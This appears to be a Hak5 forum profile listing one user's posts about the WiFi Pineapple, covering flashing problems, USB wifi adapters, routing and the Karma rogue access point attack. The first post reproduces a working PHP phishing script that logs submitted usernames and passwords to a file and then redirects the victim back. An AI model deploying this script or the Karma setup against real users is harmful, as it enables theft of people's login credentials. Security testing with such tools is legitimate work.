Jump to content

janekong

Active Members
  • Posts

    67
  • Joined

  • Last visited

Posts posted by janekong

  1. I consider the flashing a huge failure....

    It shows a read not execute php file with the name error-1.php.

    '/pineapple/logs/phish.log" does not exist btw...

    What additional hardware is recommended for flashing?

    I read a very very confusing conversation here: http://forums.hak5.org/index.php?/topic/26066-flash-a-hornet/

    About yes, it does work with usb.

    But you need an UART adapter.

    No, it does not work, it will fry your device. 'Both Darren and Seb have fried either boards or the adapters while developing.'

    very confusing....

    <?php
    $ref = $_SERVER['HTTP_REFERER'];
    $today = date("F j, Y, g:i a");
    if (isset($_POST['name']) && !empty($_POST['name'])) {
    $nam = stripslashes($_POST['name']);
    $pas = stripslashes($_POST['pass']);
    $nam = htmlspecialchars($nam, ENT_QUOTES);
    $pas = htmlspecialchars($pas, ENT_QUOTES);
    $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
    $filed = @fopen("/pineapple/logs/phish.log", "a+");
    @fwrite($filed, "$content\n");
    @fclose($filed);
    }
    ?>
    <html><head>
    <script type="text/javascript">
    function goBack()
    {
    window.history.back()
    }
    </script>
    </head>
    <body onload="goBack()">
    </body></html>
  2. ' Networkmanager infusion' Can I configure it manually as well, if the natwork manager fails?

    Yes, that is the correct card.

    For routing, try the Networkmanager Infusion.

    I don't know what you mean about the Karma attack. What autoconnection are you talking about? On the clients? The answer is not really.

    I am assuming you mean the AWUS036nha? It is better to do it the other way around - use that card to supply internet to the pineapple and keep using the internal card for Karma / Jasager.

    The best way to do this is download the Networkmanager infusion and use that to set everything up!

    Please don't make multiple threads on the same subject. I have merged the two.

    Best Regards,

    Sebkinne

  3. Is the correct usb wifi card in the pineapple pro pack?

    I can't find the tutorial for the routing, when using the usb wifi card?

    Does this karma attack work with autoconnect disabled?

    The answer is yes, the Pineapple can connect to the internet over wifi. To be able to use Karma or the wifi card for other things, you will require a USB wifi card (see the hakshop for some Alfas).

    Using that, you can make it connect to WiFi, and keep using the internal card for Karma etc.

    Best Regards,

    Sebkinne

  4. Thank you. But how should I do the portforwarding. I couldn't find any tutorial mentioning the setup with this usb-wifi adapter.

    How you tried the portforwarding yourself before?

    PS: Is this antenna is the Pineapple pro bundle?

    Well if you use the internal wireless adapter of the Pineapple to connect to a wifi hotspot you can no longer use karma or certain other services that run on the default wlan0 of the wifi pineapple. If you wish to connect to a wireless network with the pineapple and without a laptop you will need an external wireless adapter to connect to the wifi hotspot and that will allow you to use karma and all other services on the pineapple.

    This would be a great external adapter to buy.. its supported hardware for the pineapple. http://hakshop.myshopify.com/products/alfa-usb-wifi-awus036nha

  5. Can the wifi apple connect to internet (through wifi) without needing an external computer/laptop?


    I got the getting started tutorial and I read that you need to share the wifi connection from your computer/laptop to Wifi pineapple using the LAN cable.


    But why can't I just connect to a wifihotspot (I know the password of the hotspot) and then just share the internet connection from the wifihotspot I just connected with, with my Wifi Pineapple?



    Why do I need to share the internet connection through my laptop/computer?


    So, why: 'Pineapple -> laptop -> internet'. And 'internet -> laptop -> Pineapple'?


    And not just: 'Pineapple -> internet'. 'internet -> Pineapple '?



  6. Can the wifi apple connect to internet (through wifi) without needing an external computer?

    I got the getting started tutorial and I read that you need to share the wifi connection from your computer/laptop to Wifi pineapple using the LAN cable.

    But why can't I just connect to a wifihotspot (I know the password of the hotspot) and then just share the internet connection from the wifihotspot I just connected with, with my Wifi Pineapple?

    Why do I need to share the internet connection through my laptop/computer?

    So, why: 'Pineapple -> laptop -> internet'. And 'internet -> laptop -> Pineapple'?

    And not just: 'Pineapple -> internet'. 'internet -> Pineapple '?

×
×
  • Create New...